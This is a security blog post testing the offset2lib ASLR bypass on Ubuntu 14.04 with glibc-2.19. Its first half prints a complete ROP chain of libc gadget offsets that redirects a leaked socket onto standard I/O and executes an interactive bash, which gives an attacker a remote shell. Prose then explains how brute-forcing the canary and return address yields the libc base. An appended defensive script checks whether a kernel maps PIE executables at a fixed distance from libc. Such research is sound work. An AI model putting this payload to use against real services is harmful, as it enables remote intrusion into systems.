zerons's Blog

For The Dream

offset2lib glibc-2.19 test

zerons posted @ 2015-04-07 14:47 in sec, 1265 reads

ref http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html

Environment: Ubuntu 14.04.2, glibc-2.19, kernel 3.18.9

The offset2lib .py file needs to be modified to match glibc-2.19 (the gadget and .data offsets below are the ones for that version):

from struct import pack   # Python 2: pack() returns str, so it concatenates with the "/bin/bas" literals below

off = libc_base  # libc load base, computed earlier in the script from the leaked rip
# p holds the chain built so far (overflow padding, canary, rbp), also from earlier in the script

# dup2 the leaked socket (fd 4) onto the three standard I/O FDs (STDIN, STDOUT, STDERR)
# dup2(4,0)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x0)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) # SYS_dup2 (33)
p += pack('Q', off) # padding (consumed before the ret)
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,1)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x1)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) # SYS_dup2 (33)
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# dup2(4,2)
p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack("Q", 0x2)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack("Q", 0x4)
p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x0000000000000021) # SYS_dup2 (33)
p += pack('Q', off) # padding
p += pack('Q', off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

# Build "/bin/bash\0" at .data (the trailing 'A's are overwritten by the NUL writes below)
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "/bin/bas" # /bin/bas
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf088) # @ .data + 8
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "hAAAAAAA" # hAAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf089) # @ .data + 9
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

# Build "-i\0" at .data + 10
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += "-iAAAAAA" # -iAAAAAA
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08c) # @ .data + 12
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

# Build argv at .data + 13: {"/bin/bash", "-i", NULL}
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf095) # @ .data + 21
p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf08a) # @ .data + 10
p += pack('Q', off + 0x000000000001fc27) # mov qword ptr [rdi], rdx ; ret

p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29
p += pack('Q', off + 0x0000000000088c85) # xor rax, rax ; ret
p += pack('Q', off + 0x0000000000037b25) # mov qword ptr [rdi], rax ; ret

# execve(.data, .data + 13, .data + 29): envp points at the NULL written above
p += pack('Q', off + 0x000000000006fc7d) # pop rdi ; ret
p += pack('Q', off + 0x00000000003bf080) # @ .data

p += pack('Q', off + 0x000000000010816a) # pop rsi ; ret
p += pack('Q', off + 0x00000000003bf08d) # @ .data + 13

p += pack('Q', off + 0x00000000000bcee0) # pop rdx ; ret
p += pack('Q', off + 0x00000000003bf09d) # @ .data + 29

p += pack('Q', off + 0x000000000001f576) # pop rax ; ret
p += pack("Q", 0x000000000000003b) # SYS_execve (59)
p += pack("Q", off) # padding
p += pack("Q", off) # padding
p += pack('Q', off + 0x00000000000c1e55) # syscall ; ret

The code works by repeatedly comparing what the server program returns on each attempt, and in this way determines, in order, the overflow offset, the canary, rbp and rip. From rip the program's load base is obtained, and from that the libc load base (on this kernel the PIE executable is mapped at a fixed distance from the shared libraries, which is the offset2lib weakness). The offsets of the needed instructions within libc are then used to duplicate the file descriptor onto the standard I/O descriptors and execute bash.
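The step that turns a leaked executable address into the libc base only works because, on kernels before the offset2lib fix (mainline Linux 4.1 moved PIE executables out of the mmap area), a PIE binary and its libraries sit at a fixed distance from each other. A defender's check for that condition, added here as an example and not part of the original post or the offset2lib code: parse several process map samples, compute the executable-to-libc distance in each, and report the kernel as exposed when the distance never changes. The maps text, the path `/srv/vuln/server`, the inode numbers and all addresses are constructed for the example; the live check at the bottom spawns the running Python interpreter and reads its `/proc/self/maps`, which is only meaningful if that interpreter is itself a PIE executable.

```python
"""offset2lib check: is a PIE executable always mapped at the same distance
from libc?  If so, one leaked executable address yields the libc base.
Constructed sample data (not real captures) plus an optional live check."""
import os
import re
import subprocess
import sys

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
_MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+\S+\s+\S+\s+\S+\s*(.*)$")
_LIBC_RE = re.compile(r"/libc(?:-[\d.]+)?\.so")   # libc-2.19.so or libc.so.6


def parse_maps(text):
    """Return [(start, end, perms, path)] for every well-formed maps line."""
    regions = []
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if m:
            regions.append((int(m.group(1), 16), int(m.group(2), 16),
                            m.group(3), m.group(4)))
    return regions


def lowest_base(regions, wanted):
    """Lowest start address among regions whose path satisfies wanted()."""
    starts = [s for s, _, _, path in regions if wanted(path)]
    return min(starts) if starts else None


def exe_to_libc_delta(maps_text, exe_path):
    """libc base minus executable base for one process, or None if absent."""
    regions = parse_maps(maps_text)
    exe_base = lowest_base(regions, lambda p: p == exe_path)
    libc_base = lowest_base(regions, lambda p: _LIBC_RE.search(p) is not None)
    if exe_base is None or libc_base is None:
        return None
    return libc_base - exe_base


def offset2lib_exposed(deltas):
    """True when at least two usable samples exist and all show one distance."""
    usable = [d for d in deltas if d is not None]
    return len(usable) >= 2 and len(set(usable)) == 1


def constructed_maps(exe_base, libc_base):
    """Maps-style text for a PIE at exe_base and libc at libc_base.
    Paths, inodes, segment sizes and the stack address are constructed."""
    exe = "/srv/vuln/server"
    libc = "/lib/x86_64-linux-gnu/libc-2.19.so"
    ld = "/lib/x86_64-linux-gnu/ld-2.19.so"

    def seg(lo, hi, perms, off, dev, inode, path):
        return "%x-%x %s %08x %s %d %s" % (lo, hi, perms, off, dev, inode, path)

    e, c = exe_base, libc_base
    lines = [
        seg(e, e + 0x2000, "r-xp", 0, "08:01", 131090, exe),
        seg(e + 0x201000, e + 0x202000, "r--p", 0x1000, "08:01", 131090, exe),
        seg(e + 0x202000, e + 0x203000, "rw-p", 0x2000, "08:01", 131090, exe),
        seg(e + 0x203000, e + 0x224000, "rw-p", 0, "00:00", 0, "[heap]"),
        seg(c, c + 0x1bb000, "r-xp", 0, "08:01", 393254, libc),
        seg(c + 0x1bb000, c + 0x3bb000, "---p", 0x1bb000, "08:01", 393254, libc),
        seg(c + 0x3bb000, c + 0x3bf000, "r--p", 0x1bb000, "08:01", 393254, libc),
        seg(c + 0x3bf000, c + 0x3c1000, "rw-p", 0x1bf000, "08:01", 393254, libc),
        seg(c + 0x3c6000, c + 0x3e9000, "r-xp", 0, "08:01", 393250, ld),
        "7ffd6a1e4000-7ffd6a205000 rw-p 00000000 00:00 0 [stack]",
    ]
    return "\n".join(lines) + "\n"


_DUMP_MAPS = "import sys; sys.stdout.write(open('/proc/self/maps').read())"


def live_deltas(runs=4):
    """Spawn the current interpreter several times and collect its distances.
    Only meaningful when the interpreter binary is itself a PIE executable."""
    exe = os.path.realpath(sys.executable)
    deltas = []
    for _ in range(runs):
        out = subprocess.run([sys.executable, "-c", _DUMP_MAPS],
                             capture_output=True, text=True, check=True).stdout
        deltas.append(exe_to_libc_delta(out, exe))
    return deltas


if __name__ == "__main__":
    if os.path.exists("/proc/self/maps"):
        d = live_deltas()
        print("deltas:", [hex(x) if x is not None else None for x in d])
        print("offset2lib exposed:", offset2lib_exposed(d))
    else:
        print("no /proc/self/maps here; run this on Linux")
```

The constructed "affected" samples place libc 0x3ea000 bytes below the executable in every run, as an older kernel does when it packs the PIE next to the libraries, while the "fixed" samples put the executable in the 0x55.../0x56... range far from libc, so the distance changes between runs. The sign of the distance does not matter; only its constancy does.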
